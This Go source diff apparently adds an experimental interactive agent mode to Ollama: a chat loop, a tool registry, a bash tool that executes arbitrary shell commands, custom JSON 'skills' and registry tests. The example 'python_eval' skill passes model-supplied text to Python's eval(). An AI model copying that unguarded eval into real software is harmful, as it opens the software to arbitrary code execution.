state = &displayResponseState{}
|
||||
|
||||
// Start new progress spinner for next API call
|
||||
p = progress.NewProgress(os.Stderr)
|
||||
spinner = progress.NewSpinner("")
|
||||
p.Add("", spinner)
|
||||
}
|
||||
|
||||
if len(opts.Messages) > 0 {
|
||||
fmt.Println()
|
||||
fmt.Println()
|
||||
}
|
||||
|
||||
return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
|
||||
}
|
||||
|
||||
// truncateUTF8 safely truncates a string to at most limit runes, adding "..." if truncated.
|
||||
func truncateUTF8(s string, limit int) string {
|
||||
runes := []rune(s)
|
||||
if len(runes) <= limit {
|
||||
return s
|
||||
}
|
||||
if limit <= 3 {
|
||||
return string(runes[:limit])
|
||||
}
|
||||
return string(runes[:limit-3]) + "..."
|
||||
}
|
||||
|
||||
// formatToolShort returns a short description of a tool call.
|
||||
func formatToolShort(toolName string, args map[string]any) string {
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50))
|
||||
}
|
||||
}
|
||||
if toolName == "web_search" {
|
||||
if query, ok := args["query"].(string); ok {
|
||||
return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50))
|
||||
}
|
||||
}
|
||||
return toolName
|
||||
}
|
||||
|
||||
// Helper types and functions for display
|
||||
|
||||
type displayResponseState struct {
|
||||
lineLength int
|
||||
wordBuffer string
|
||||
}
|
||||
|
||||
func displayResponse(content string, wordWrap bool, state *displayResponseState) {
|
||||
termWidth, _, _ := term.GetSize(int(os.Stdout.Fd()))
|
||||
if wordWrap && termWidth >= 10 {
|
||||
for _, ch := range content {
|
||||
if state.lineLength+1 > termWidth-5 {
|
||||
if len(state.wordBuffer) > termWidth-10 {
|
||||
fmt.Printf("%s%c", state.wordBuffer, ch)
|
||||
state.wordBuffer = ""
|
||||
state.lineLength = 0
|
||||
continue
|
||||
}
|
||||
|
||||
// backtrack the length of the last word and clear to the end of the line
|
||||
a := len(state.wordBuffer)
|
||||
if a > 0 {
|
||||
fmt.Printf("\x1b[%dD", a)
|
||||
}
|
||||
fmt.Printf("\x1b[K\n")
|
||||
fmt.Printf("%s%c", state.wordBuffer, ch)
|
||||
|
||||
state.lineLength = len(state.wordBuffer) + 1
|
||||
} else {
|
||||
fmt.Print(string(ch))
|
||||
state.lineLength++
|
||||
|
||||
switch ch {
|
||||
case ' ', '\t':
|
||||
state.wordBuffer = ""
|
||||
case '\n', '\r':
|
||||
state.lineLength = 0
|
||||
state.wordBuffer = ""
|
||||
default:
|
||||
state.wordBuffer += string(ch)
|
||||
}
|
||||
}
|
||||
}
|
||||
} else {
|
||||
fmt.Printf("%s%s", state.wordBuffer, content)
|
||||
if len(state.wordBuffer) > 0 {
|
||||
state.wordBuffer = ""
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func thinkingOutputOpeningText(plainText bool) string {
|
||||
text := "Thinking...\n"
|
||||
|
||||
if plainText {
|
||||
return text
|
||||
}
|
||||
|
||||
return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault + readline.ColorGrey
|
||||
}
|
||||
|
||||
func thinkingOutputClosingText(plainText bool) string {
|
||||
text := "...done thinking.\n\n"
|
||||
|
||||
if plainText {
|
||||
return text
|
||||
}
|
||||
|
||||
return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault
|
||||
}
|
||||
|
||||
func renderToolCalls(toolCalls []api.ToolCall, plainText bool) string {
|
||||
out := ""
|
||||
formatExplanation := ""
|
||||
formatValues := ""
|
||||
if !plainText {
|
||||
formatExplanation = readline.ColorGrey + readline.ColorBold
|
||||
formatValues = readline.ColorDefault
|
||||
out += formatExplanation
|
||||
}
|
||||
for i, toolCall := range toolCalls {
|
||||
argsAsJSON, err := json.Marshal(toolCall.Function.Arguments)
|
||||
if err != nil {
|
||||
return ""
|
||||
}
|
||||
if i > 0 {
|
||||
out += "\n"
|
||||
}
|
||||
out += fmt.Sprintf(" Tool call: %s(%s)", formatValues+toolCall.Function.Name+formatExplanation, formatValues+string(argsAsJSON)+formatExplanation)
|
||||
}
|
||||
if !plainText {
|
||||
out += readline.ColorDefault
|
||||
}
|
||||
return out
|
||||
}
|
||||
|
||||
// checkModelCapabilities checks if the model supports tools.
|
||||
func checkModelCapabilities(ctx context.Context, modelName string) (supportsTools bool, err error) {
|
||||
client, err := api.ClientFromEnvironment()
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
resp, err := client.Show(ctx, &api.ShowRequest{Model: modelName})
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
for _, cap := range resp.Capabilities {
|
||||
if cap == model.CapabilityTools {
|
||||
return true, nil
|
||||
}
|
||||
}
|
||||
|
||||
return false, nil
|
||||
}
|
||||
|
||||
// GenerateInteractive runs an interactive agent session.
|
||||
// This is called from cmd.go when --experimental flag is set.
|
||||
func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration) error {
|
||||
scanner, err := readline.New(readline.Prompt{
|
||||
Prompt: ">>> ",
|
||||
AltPrompt: "... ",
|
||||
Placeholder: "Send a message (/? for help)",
|
||||
AltPlaceholder: `Use """ to end multi-line input`,
|
||||
})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
fmt.Print(readline.StartBracketedPaste)
|
||||
defer fmt.Printf(readline.EndBracketedPaste)
|
||||
|
||||
// Check if model supports tools
|
||||
supportsTools, err := checkModelCapabilities(cmd.Context(), modelName)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err)
|
||||
supportsTools = false
|
||||
}
|
||||
|
||||
// Create tool registry only if model supports tools
|
||||
var toolRegistry *tools.Registry
|
||||
if supportsTools {
|
||||
toolRegistry = tools.DefaultRegistry()
|
||||
|
||||
// Load custom skills from skill files
|
||||
loadedFiles, err := tools.LoadAllSkills(toolRegistry)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "\033[33mWarning: Error loading skills: %v\033[0m\n", err)
|
||||
} else if len(loadedFiles) > 0 {
|
||||
fmt.Fprintf(os.Stderr, "Loaded skills from: %s\n", strings.Join(loadedFiles, ", "))
|
||||
}
|
||||
|
||||
fmt.Fprintf(os.Stderr, "Tools available: %s\n", strings.Join(toolRegistry.Names(), ", "))
|
||||
|
||||
// Check for OLLAMA_API_KEY for web search
|
||||
if os.Getenv("OLLAMA_API_KEY") == "" {
|
||||
fmt.Fprintf(os.Stderr, "\033[33mWarning: OLLAMA_API_KEY not set - web search will not work\033[0m\n")
|
||||
}
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n")
|
||||
}
|
||||
|
||||
// Create approval manager for session
|
||||
approval := agent.NewApprovalManager()
|
||||
|
||||
var messages []api.Message
|
||||
var sb strings.Builder
|
||||
|
||||
for {
|
||||
line, err := scanner.Readline()
|
||||
switch {
|
||||
case errors.Is(err, io.EOF):
|
||||
fmt.Println()
|
||||
return nil
|
||||
case errors.Is(err, readline.ErrInterrupt):
|
||||
if line == "" {
|
||||
fmt.Println("\nUse Ctrl + d or /bye to exit.")
|
||||
}
|
||||
sb.Reset()
|
||||
continue
|
||||
case err != nil:
|
||||
return err
|
||||
}
|
||||
|
||||
switch {
|
||||
case strings.HasPrefix(line, "/exit"), strings.HasPrefix(line, "/bye"):
|
||||
return nil
|
||||
case strings.HasPrefix(line, "/clear"):
|
||||
messages = []api.Message{}
|
||||
approval.Reset()
|
||||
fmt.Println("Cleared session context and tool approvals")
|
||||
continue
|
||||
case strings.HasPrefix(line, "/tools"):
|
||||
showToolsStatus(toolRegistry, approval, supportsTools)
|
||||
continue
|
||||
case strings.HasPrefix(line, "/skills reload"):
|
||||
if toolRegistry != nil {
|
||||
loadedFiles, err := tools.LoadAllSkills(toolRegistry)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "\033[33mWarning: Error loading skills: %v\033[0m\n", err)
|
||||
} else if len(loadedFiles) > 0 {
|
||||
fmt.Fprintf(os.Stderr, "Reloaded skills from: %s\n", strings.Join(loadedFiles, ", "))
|
||||
fmt.Fprintf(os.Stderr, "Tools available: %s\n", strings.Join(toolRegistry.Names(), ", "))
|
||||
} else {
|
||||
fmt.Fprintln(os.Stderr, "No skill files found")
|
||||
}
|
||||
} else {
|
||||
fmt.Fprintln(os.Stderr, "Tools not available - model does not support tool calling")
|
||||
}
|
||||
continue
|
||||
case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
|
||||
fmt.Fprintln(os.Stderr, "Available Commands:")
|
||||
fmt.Fprintln(os.Stderr, " /tools Show available tools and approvals")
|
||||
fmt.Fprintln(os.Stderr, " /skills reload Reload custom skills from skill files")
|
||||
fmt.Fprintln(os.Stderr, " /clear Clear session context and approvals")
|
||||
fmt.Fprintln(os.Stderr, " /bye Exit")
|
||||
fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
|
||||
fmt.Fprintln(os.Stderr, "")
|
||||
fmt.Fprintln(os.Stderr, "Custom Skills:")
|
||||
fmt.Fprintln(os.Stderr, " Skills are loaded from JSON files in these locations:")
|
||||
fmt.Fprintln(os.Stderr, " ./ollama-skills.json")
|
||||
fmt.Fprintln(os.Stderr, " ~/.ollama/skills.json")
|
||||
fmt.Fprintln(os.Stderr, " ~/.config/ollama/skills.json")
|
||||
fmt.Fprintln(os.Stderr, "")
|
||||
continue
|
||||
case strings.HasPrefix(line, "/"):
|
||||
fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
|
||||
continue
|
||||
default:
|
||||
sb.WriteString(line)
|
||||
}
|
||||
|
||||
if sb.Len() > 0 {
|
||||
newMessage := api.Message{Role: "user", Content: sb.String()}
|
||||
messages = append(messages, newMessage)
|
||||
|
||||
opts := RunOptions{
|
||||
Model: modelName,
|
||||
Messages: messages,
|
||||
WordWrap: wordWrap,
|
||||
Options: options,
|
||||
Think: think,
|
||||
HideThinking: hideThinking,
|
||||
KeepAlive: keepAlive,
|
||||
Tools: toolRegistry,
|
||||
Approval: approval,
|
||||
}
|
||||
|
||||
assistant, err := Chat(cmd.Context(), opts)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if assistant != nil {
|
||||
messages = append(messages, *assistant)
|
||||
}
|
||||
|
||||
sb.Reset()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// showToolsStatus displays the current tools and approval status.
|
||||
func showToolsStatus(registry *tools.Registry, approval *agent.ApprovalManager, supportsTools bool) {
|
||||
if !supportsTools || registry == nil {
|
||||
fmt.Println("Tools not available - model does not support tool calling")
|
||||
fmt.Println()
|
||||
return
|
||||
}
|
||||
|
||||
fmt.Println("Available tools:")
|
||||
for _, name := range registry.Names() {
|
||||
tool, _ := registry.Get(name)
|
||||
fmt.Printf(" %s - %s\n", name, tool.Description())
|
||||
}
|
||||
|
||||
allowed := approval.AllowedTools()
|
||||
if len(allowed) > 0 {
|
||||
fmt.Println("\nSession approvals:")
|
||||
for _, key := range allowed {
|
||||
fmt.Printf(" %s\n", key)
|
||||
}
|
||||
} else {
|
||||
fmt.Println("\nNo tools approved for this session yet")
|
||||
}
|
||||
fmt.Println()
|
||||
}
|
||||
114
x/tools/bash.go
Normal file
114
x/tools/bash.go
Normal file
@@ -0,0 +1,114 @@
|
||||
package tools
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"fmt"
|
||||
"os/exec"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
const (
|
||||
// bashTimeout is the maximum execution time for a command.
|
||||
bashTimeout = 60 * time.Second
|
||||
// maxOutputSize is the maximum output size in bytes.
|
||||
maxOutputSize = 50000
|
||||
)
|
||||
|
||||
// BashTool implements shell command execution.
|
||||
type BashTool struct{}
|
||||
|
||||
// Name returns the tool name.
|
||||
func (b *BashTool) Name() string {
|
||||
return "bash"
|
||||
}
|
||||
|
||||
// Description returns a description of the tool.
|
||||
func (b *BashTool) Description() string {
|
||||
return "Execute a bash command on the system. Use this to run shell commands, check files, run programs, etc."
|
||||
}
|
||||
|
||||
// Schema returns the tool's parameter schema.
|
||||
func (b *BashTool) Schema() api.ToolFunction {
|
||||
props := api.NewToolPropertiesMap()
|
||||
props.Set("command", api.ToolProperty{
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The bash command to execute",
|
||||
})
|
||||
return api.ToolFunction{
|
||||
Name: b.Name(),
|
||||
Description: b.Description(),
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: props,
|
||||
Required: []string{"command"},
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// Execute runs the bash command.
|
||||
func (b *BashTool) Execute(args map[string]any) (string, error) {
|
||||
command, ok := args["command"].(string)
|
||||
if !ok || command == "" {
|
||||
return "", fmt.Errorf("command parameter is required")
|
||||
}
|
||||
|
||||
// Create context with timeout
|
||||
ctx, cancel := context.WithTimeout(context.Background(), bashTimeout)
|
||||
defer cancel()
|
||||
|
||||
// Execute command
|
||||
cmd := exec.CommandContext(ctx, "bash", "-c", command)
|
||||
|
||||
var stdout, stderr bytes.Buffer
|
||||
cmd.Stdout = &stdout
|
||||
cmd.Stderr = &stderr
|
||||
|
||||
err := cmd.Run()
|
||||
|
||||
// Build output
|
||||
var sb strings.Builder
|
||||
|
||||
// Add stdout
|
||||
if stdout.Len() > 0 {
|
||||
output := stdout.String()
|
||||
if len(output) > maxOutputSize {
|
||||
output = output[:maxOutputSize] + "\n... (output truncated)"
|
||||
}
|
||||
sb.WriteString(output)
|
||||
}
|
||||
|
||||
// Add stderr if present
|
||||
if stderr.Len() > 0 {
|
||||
stderrOutput := stderr.String()
|
||||
if len(stderrOutput) > maxOutputSize {
|
||||
stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)"
|
||||
}
|
||||
if sb.Len() > 0 {
|
||||
sb.WriteString("\n")
|
||||
}
|
||||
sb.WriteString("stderr:\n")
|
||||
sb.WriteString(stderrOutput)
|
||||
}
|
||||
|
||||
// Handle errors
|
||||
if err != nil {
|
||||
if ctx.Err() == context.DeadlineExceeded {
|
||||
return sb.String() + "\n\nError: command timed out after 60 seconds", nil
|
||||
}
|
||||
// Include exit code in output but don't return as error
|
||||
if exitErr, ok := err.(*exec.ExitError); ok {
|
||||
return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil
|
||||
}
|
||||
return sb.String(), fmt.Errorf("executing command: %w", err)
|
||||
}
|
||||
|
||||
if sb.Len() == 0 {
|
||||
return "(no output)", nil
|
||||
}
|
||||
|
||||
return sb.String(), nil
|
||||
}
|
||||
44
x/tools/example-skills.json
Normal file
44
x/tools/example-skills.json
Normal file
@@ -0,0 +1,44 @@
|
||||
{
|
||||
"version": "1",
|
||||
"skills": [
|
||||
{
|
||||
"name": "get_time",
|
||||
"description": "Get the current date and time. Use this when the user asks about the current time or date.",
|
||||
"parameters": [],
|
||||
"executor": {
|
||||
"type": "script",
|
||||
"command": "date",
|
||||
"timeout": 5
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "system_info",
|
||||
"description": "Get system information including OS, hostname, and uptime.",
|
||||
"parameters": [],
|
||||
"executor": {
|
||||
"type": "script",
|
||||
"command": "sh",
|
||||
"args": ["-c", "echo \"Hostname: $(hostname)\"; echo \"OS: $(uname -s)\"; echo \"Kernel: $(uname -r)\"; echo \"Uptime: $(uptime -p 2>/dev/null || uptime)\""],
|
||||
"timeout": 10
|
||||
}
|
||||
},
|
||||
{
|
||||
"name": "python_eval",
|
||||
"description": "Evaluate a Python expression. The expression is passed via stdin as JSON with an 'expression' field.",
|
||||
"parameters": [
|
||||
{
|
||||
"name": "expression",
|
||||
"type": "string",
|
||||
"description": "The Python expression to evaluate",
|
||||
"required": true
|
||||
}
|
||||
],
|
||||
"executor": {
|
||||
"type": "script",
|
||||
"command": "python3",
|
||||
"args": ["-c", "import sys, json; data = json.load(sys.stdin); print(eval(data.get('expression', '')))"],
|
||||
"timeout": 30
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
96
x/tools/registry.go
Normal file
96
x/tools/registry.go
Normal file
@@ -0,0 +1,96 @@
|
||||
// Package tools provides built-in tool implementations for the agent loop.
|
||||
package tools
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"sort"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// Tool defines the interface for agent tools.
|
||||
type Tool interface {
|
||||
// Name returns the tool's unique identifier.
|
||||
Name() string
|
||||
// Description returns a human-readable description of what the tool does.
|
||||
Description() string
|
||||
// Schema returns the tool's parameter schema for the LLM.
|
||||
Schema() api.ToolFunction
|
||||
// Execute runs the tool with the given arguments.
|
||||
Execute(args map[string]any) (string, error)
|
||||
}
|
||||
|
||||
// Registry manages available tools.
|
||||
type Registry struct {
|
||||
tools map[string]Tool
|
||||
}
|
||||
|
||||
// NewRegistry creates a new tool registry.
|
||||
func NewRegistry() *Registry {
|
||||
return &Registry{
|
||||
tools: make(map[string]Tool),
|
||||
}
|
||||
}
|
||||
|
||||
// Register adds a tool to the registry.
|
||||
func (r *Registry) Register(tool Tool) {
|
||||
r.tools[tool.Name()] = tool
|
||||
}
|
||||
|
||||
// Get retrieves a tool by name.
|
||||
func (r *Registry) Get(name string) (Tool, bool) {
|
||||
tool, ok := r.tools[name]
|
||||
return tool, ok
|
||||
}
|
||||
|
||||
// Tools returns all registered tools in Ollama API format, sorted by name.
|
||||
func (r *Registry) Tools() api.Tools {
|
||||
// Get sorted names for deterministic ordering
|
||||
names := make([]string, 0, len(r.tools))
|
||||
for name := range r.tools {
|
||||
names = append(names, name)
|
||||
}
|
||||
sort.Strings(names)
|
||||
|
||||
var tools api.Tools
|
||||
for _, name := range names {
|
||||
tool := r.tools[name]
|
||||
tools = append(tools, api.Tool{
|
||||
Type: "function",
|
||||
Function: tool.Schema(),
|
||||
})
|
||||
}
|
||||
return tools
|
||||
}
|
||||
|
||||
// Execute runs a tool call and returns the result.
|
||||
func (r *Registry) Execute(call api.ToolCall) (string, error) {
|
||||
tool, ok := r.tools[call.Function.Name]
|
||||
if !ok {
|
||||
return "", fmt.Errorf("unknown tool: %s", call.Function.Name)
|
||||
}
|
||||
return tool.Execute(call.Function.Arguments.ToMap())
|
||||
}
|
||||
|
||||
// Names returns the names of all registered tools, sorted alphabetically.
|
||||
func (r *Registry) Names() []string {
|
||||
names := make([]string, 0, len(r.tools))
|
||||
for name := range r.tools {
|
||||
names = append(names, name)
|
||||
}
|
||||
sort.Strings(names)
|
||||
return names
|
||||
}
|
||||
|
||||
// Count returns the number of registered tools.
|
||||
func (r *Registry) Count() int {
|
||||
return len(r.tools)
|
||||
}
|
||||
|
||||
// DefaultRegistry creates a registry with all built-in tools.
|
||||
func DefaultRegistry() *Registry {
|
||||
r := NewRegistry()
|
||||
r.Register(&WebSearchTool{})
|
||||
r.Register(&BashTool{})
|
||||
return r
|
||||
}
|
||||
143
x/tools/registry_test.go
Normal file
143
x/tools/registry_test.go
Normal file
@@ -0,0 +1,143 @@
|
||||
package tools
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
func TestRegistry_Register(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
|
||||
r.Register(&BashTool{})
|
||||
r.Register(&WebSearchTool{})
|
||||
|
||||
if r.Count() != 2 {
|
||||
t.Errorf("expected 2 tools, got %d", r.Count())
|
||||
}
|
||||
|
||||
names := r.Names()
|
||||
if len(names) != 2 {
|
||||
t.Errorf("expected 2 names, got %d", len(names))
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_Get(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&BashTool{})
|
||||
|
||||
tool, ok := r.Get("bash")
|
||||
if !ok {
|
||||
t.Fatal("expected to find bash tool")
|
||||
}
|
||||
|
||||
if tool.Name() != "bash" {
|
||||
t.Errorf("expected name 'bash', got '%s'", tool.Name())
|
||||
}
|
||||
|
||||
_, ok = r.Get("nonexistent")
|
||||
if ok {
|
||||
t.Error("expected not to find nonexistent tool")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_Tools(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&BashTool{})
|
||||
r.Register(&WebSearchTool{})
|
||||
|
||||
tools := r.Tools()
|
||||
if len(tools) != 2 {
|
||||
t.Errorf("expected 2 tools, got %d", len(tools))
|
||||
}
|
||||
|
||||
for _, tool := range tools {
|
||||
if tool.Type != "function" {
|
||||
t.Errorf("expected type 'function', got '%s'", tool.Type)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_Execute(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&BashTool{})
|
||||
|
||||
// Test successful execution
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
args.Set("command", "echo hello")
|
||||
result, err := r.Execute(api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "bash",
|
||||
Arguments: args,
|
||||
},
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
if result != "hello\n" {
|
||||
t.Errorf("expected 'hello\\n', got '%s'", result)
|
||||
}
|
||||
|
||||
// Test unknown tool
|
||||
_, err = r.Execute(api.ToolCall{
|
||||
Function: api.ToolCallFunction{
|
||||
Name: "unknown",
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
})
|
||||
if err == nil {
|
||||
t.Error("expected error for unknown tool")
|
||||
}
|
||||
}
|
||||
|
||||
func TestDefaultRegistry(t *testing.T) {
|
||||
r := DefaultRegistry()
|
||||
|
||||
if r.Count() != 2 {
|
||||
t.Errorf("expected 2 tools in default registry, got %d", r.Count())
|
||||
}
|
||||
|
||||
_, ok := r.Get("bash")
|
||||
if !ok {
|
||||
t.Error("expected bash tool in default registry")
|
||||
}
|
||||
|
||||
_, ok = r.Get("web_search")
|
||||
if !ok {
|
||||
t.Error("expected web_search tool in default registry")
|
||||
}
|
||||
}
|
||||
|
||||
func TestBashTool_Schema(t *testing.T) {
|
||||
tool := &BashTool{}
|
||||
|
||||
schema := tool.Schema()
|
||||
if schema.Name != "bash" {
|
||||
t.Errorf("expected name 'bash', got '%s'", schema.Name)
|
||||
}
|
||||
|
||||
if schema.Parameters.Type != "object" {
|
||||
t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
|
||||
}
|
||||
|
||||
if _, ok := schema.Parameters.Properties.Get("command"); !ok {
|
||||
t.Error("expected 'command' property in schema")
|
||||
}
|
||||
}
|
||||
|
||||
func TestWebSearchTool_Schema(t *testing.T) {
|
||||
tool := &WebSearchTool{}
|
||||
|
||||
schema := tool.Schema()
|
||||
if schema.Name != "web_search" {
|
||||
t.Errorf("expected name 'web_search', got '%s'", schema.Name)
|
||||
}
|
||||
|
||||
if schema.Parameters.Type != "object" {
|
||||
t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
|
||||
}
|
||||
|
||||
if _, ok := schema.Parameters.Properties.Get("query"); !ok {
|
||||
t.Error("expected 'query' property in schema")
|
||||
}
|
||||
}
|
||||
318
x/tools/skills.go
Normal file
318
x/tools/skills.go
Normal file
@@ -0,0 +1,318 @@
|
||||
// Package tools provides built-in tool implementations for the agent loop.
|
||||
package tools
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"os"
|
||||
"os/exec"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
)
|
||||
|
||||
// SkillSpec defines the specification for a custom skill.
|
||||
// Skills can be loaded from JSON files and registered with the tool registry.
|
||||
type SkillSpec struct {
|
||||
// Name is the unique identifier for the skill
|
||||
Name string `json:"name"`
|
||||
// Description is a human-readable description shown to the LLM
|
||||
Description string `json:"description"`
|
||||
// Parameters defines the input schema for the skill
|
||||
Parameters []SkillParameter `json:"parameters,omitempty"`
|
||||
// Executor defines how the skill is executed
|
||||
Executor SkillExecutor `json:"executor"`
|
||||
}
|
||||
|
||||
// SkillParameter defines a single parameter for a skill.
|
||||
type SkillParameter struct {
|
||||
// Name is the parameter name
|
||||
Name string `json:"name"`
|
||||
// Type is the JSON schema type (string, number, boolean, array, object)
|
||||
Type string `json:"type"`
|
||||
// Description explains what this parameter is for
|
||||
Description string `json:"description"`
|
||||
// Required indicates if this parameter must be provided
|
||||
Required bool `json:"required"`
|
||||
}
|
||||
|
||||
// SkillExecutor defines how to execute a skill.
|
||||
type SkillExecutor struct {
|
||||
// Type is the executor type: "script", "http", or "builtin"
|
||||
Type string `json:"type"`
|
||||
// Command is the command to run for "script" type
|
||||
// Arguments are passed as JSON via stdin, result is read from stdout
|
||||
Command string `json:"command,omitempty"`
|
||||
// Args are additional arguments appended to the command
|
||||
Args []string `json:"args,omitempty"`
|
||||
// Timeout is the maximum execution time in seconds (default: 60)
|
||||
Timeout int `json:"timeout,omitempty"`
|
||||
// URL is the endpoint for "http" type executors
|
||||
URL string `json:"url,omitempty"`
|
||||
// Method is the HTTP method (default: POST)
|
||||
Method string `json:"method,omitempty"`
|
||||
}
|
||||
|
||||
// SkillsFile represents a file containing skill definitions.
|
||||
type SkillsFile struct {
|
||||
// Version is the spec version (currently "1")
|
||||
Version string `json:"version"`
|
||||
// Skills is the list of skill definitions
|
||||
Skills []SkillSpec `json:"skills"`
|
||||
}
|
||||
|
||||
// SkillTool wraps a SkillSpec to implement the Tool interface.
|
||||
type SkillTool struct {
|
||||
spec SkillSpec
|
||||
}
|
||||
|
||||
// NewSkillTool creates a Tool from a SkillSpec.
|
||||
func NewSkillTool(spec SkillSpec) *SkillTool {
|
||||
return &SkillTool{spec: spec}
|
||||
}
|
||||
|
||||
// Name returns the skill name.
|
||||
func (s *SkillTool) Name() string {
|
||||
return s.spec.Name
|
||||
}
|
||||
|
||||
// Description returns the skill description.
|
||||
func (s *SkillTool) Description() string {
|
||||
return s.spec.Description
|
||||
}
|
||||
|
||||
// Schema returns the tool's parameter schema for the LLM.
|
||||
func (s *SkillTool) Schema() api.ToolFunction {
|
||||
props := api.NewToolPropertiesMap()
|
||||
var required []string
|
||||
|
||||
for _, param := range s.spec.Parameters {
|
||||
props.Set(param.Name, api.ToolProperty{
|
||||
Type: api.PropertyType{param.Type},
|
||||
Description: param.Description,
|
||||
})
|
||||
if param.Required {
|
||||
required = append(required, param.Name)
|
||||
}
|
||||
}
|
||||
|
||||
return api.ToolFunction{
|
||||
Name: s.spec.Name,
|
||||
Description: s.spec.Description,
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: props,
|
||||
Required: required,
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
// Execute runs the skill with the given arguments.
|
||||
func (s *SkillTool) Execute(args map[string]any) (string, error) {
|
||||
switch s.spec.Executor.Type {
|
||||
case "script":
|
||||
return s.executeScript(args)
|
||||
case "http":
|
||||
return s.executeHTTP(args)
|
||||
default:
|
||||
return "", fmt.Errorf("unknown executor type: %s", s.spec.Executor.Type)
|
||||
}
|
||||
}
|
||||
|
||||
// executeScript runs a script-based skill.
|
||||
func (s *SkillTool) executeScript(args map[string]any) (string, error) {
|
||||
if s.spec.Executor.Command == "" {
|
||||
return "", fmt.Errorf("script executor requires command")
|
||||
}
|
||||
|
||||
timeout := time.Duration(s.spec.Executor.Timeout) * time.Second
|
||||
if timeout == 0 {
|
||||
timeout = 60 * time.Second
|
||||
}
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), timeout)
|
||||
defer cancel()
|
||||
|
||||
// Build command
|
||||
cmdArgs := append([]string{}, s.spec.Executor.Args...)
|
||||
cmd := exec.CommandContext(ctx, s.spec.Executor.Command, cmdArgs...)
|
||||
|
||||
// Pass arguments as JSON via stdin
|
||||
inputJSON, err := json.Marshal(args)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("marshaling arguments: %w", err)
|
||||
}
|
||||
cmd.Stdin = bytes.NewReader(inputJSON)
|
||||
|
||||
var stdout, stderr bytes.Buffer
|
||||
cmd.Stdout = &stdout
|
||||
cmd.Stderr = &stderr
|
||||
|
||||
err = cmd.Run()
|
||||
|
||||
// Build output
|
||||
var sb strings.Builder
|
||||
if stdout.Len() > 0 {
|
||||
output := stdout.String()
|
||||
if len(output) > maxOutputSize {
|
||||
output = output[:maxOutputSize] + "\n... (output truncated)"
|
||||
}
|
||||
sb.WriteString(output)
|
||||
}
|
||||
|
||||
if stderr.Len() > 0 {
|
||||
stderrOutput := stderr.String()
|
||||
if len(stderrOutput) > maxOutputSize {
|
||||
stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)"
|
||||
}
|
||||
if sb.Len() > 0 {
|
||||
sb.WriteString("\n")
|
||||
}
|
||||
sb.WriteString("stderr:\n")
|
||||
sb.WriteString(stderrOutput)
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
if ctx.Err() == context.DeadlineExceeded {
|
||||
return sb.String() + fmt.Sprintf("\n\nError: command timed out after %d seconds", s.spec.Executor.Timeout), nil
|
||||
}
|
||||
if exitErr, ok := err.(*exec.ExitError); ok {
|
||||
return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil
|
||||
}
|
||||
return sb.String(), fmt.Errorf("executing skill: %w", err)
|
||||
}
|
